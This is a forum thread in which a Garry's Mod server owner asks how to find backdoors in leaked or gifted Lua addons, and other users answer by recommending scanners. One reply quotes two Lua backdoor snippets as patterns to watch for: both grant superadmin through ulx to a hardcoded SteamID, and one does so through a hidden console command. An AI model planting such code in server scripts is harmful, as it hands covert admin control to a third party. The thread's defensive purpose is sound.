Garry's Mod

How can i check my server addons to backdoor?

Submitted by Pimentxa, , Thread ID: 169435

Thread Closed
29-04-2020, 07:35 AM
I'm really new atthis, can you guys explain it in details? Ty

RE: How can i check my server addons to backdoor?

Lakeey put a good post about this I'll quote them below.
https://nulledbb.com/thread-How-to-find-backdoors

08-04-2020, 06:24 PM
Lakeey Wrote:
Hello ThatGuyz, backdoors can be located anywhere randomly in a .lua file. One of the best ways to make sure you do not have any backdoors is to run through each Lua file you've downloaded that was leaked or some free "premium" scripts that were given by a generous player. When you are looking through your Lua file look for something like this.

Code:
if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

Code:
concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)

Backdoors are just your admin module and rcon commands being run through a .lua file. Seems pretty simple right? Usually, some people put backdoors in scripts that contain a lot of files. So that's when a backdoor scanner comes in. Some game servers have them as an option to be installed for free, some don't have them at all. There are some safe ones out there for free if I could find one I wouldn't mind helping you to find one. So basically at the end of the day, backdoors are nothing more than admin module commands (ulx, serverguard etc.) and rcon commands being run through a .lua file. And to easily remove a backdoor is just remove the line(s) of code! Hope that helped you!

A lot of server hosts have an option to scan for backdoors, you can just scan and then remove the code that would be malicious.

29-04-2020, 05:33 PM
natecastar Wrote:
Lakeey put a good post about this I'll quote them below.
https://nulledbb.com/thread-How-to-find-backdoors

Yes, I did indeed give a good explanation and examples of what they could look like. Backdoors as well can contain server IPs. Meaning players will get redirected either during load time or in-game to a different server.
[Image: T9B2tgy.png]

Backdoors are a real problem these days especially with leaks. Gotta be careful with them, I'm working on a guide on how to check for them.

OP
This post was last modified: 29-04-2020, 06:54 PM by Pimentxa
29-04-2020, 05:45 PM
Lakeey Wrote:
Yes, I did indeed give a good explanation and examples of what they could look like. Backdoors as well can contain server IPs. Meaning players will get redirected either during load time or in-game to a different server.
Ty u and @natecastar for the help! Butif it is not too uncomfortable, can u tell me the name of that "premium script" ?

29-04-2020, 06:54 PM
Pimentxa Wrote:
Ty u and @natecastar for the help! Butif it is not too uncomfortable, can u tell me the name of that "premium script" ?

What do you mean by premium script? When I said the word premium script, I was referring to the players that come onto your server and give you these scripts for free that were leaked or are "custom" when they aren't and usually contain backdoors, and as an offer for them, they want Developer role with server files and rcon. If you want a backdoor scanner here's one for you. It might be old but I used it as well and it helps a lot. The script is self-explanatory, it runs every startup to make sure any of the brand new scripts you added has no backdoor, you can also run it again during the game to double-check. You're also able to print out a text document to read it slowly or to show all the backdoors you have. I hope was I able to help you!
[Image: T9B2tgy.png]

OP
This post was last modified: 29-04-2020, 09:42 PM by Pimentxa

29-04-2020, 09:17 PM
Lakeey Wrote:
What do you mean by premium script? When I said the word premium script, I was referring to the players that come onto your server and give you these scripts for free that were leaked or are "custom" when they aren't and usually contain backdoors, and as an offer for them, they want Developer role with server files and rcon. If you want a backdoor scanner here's one for you. It might be old but I used it as well and it helps a lot. The script is self-explanatory, it runs every startup to make sure any of the brand new scripts you added has no backdoor, you can also run it again during the game to double-check. You're also able to print out a text document to read it slowly or to show all the backdoors you have. I hope was I able to help you!

Sorry for the confusion, but I meant exactly that script!
I really appreciate the help, I scanned it with the script, and as a result I had 200 lines with backdoors ... I think it's impossible to fix all of this
take a look : print

The main reason I'm looking for this is this:Cheaters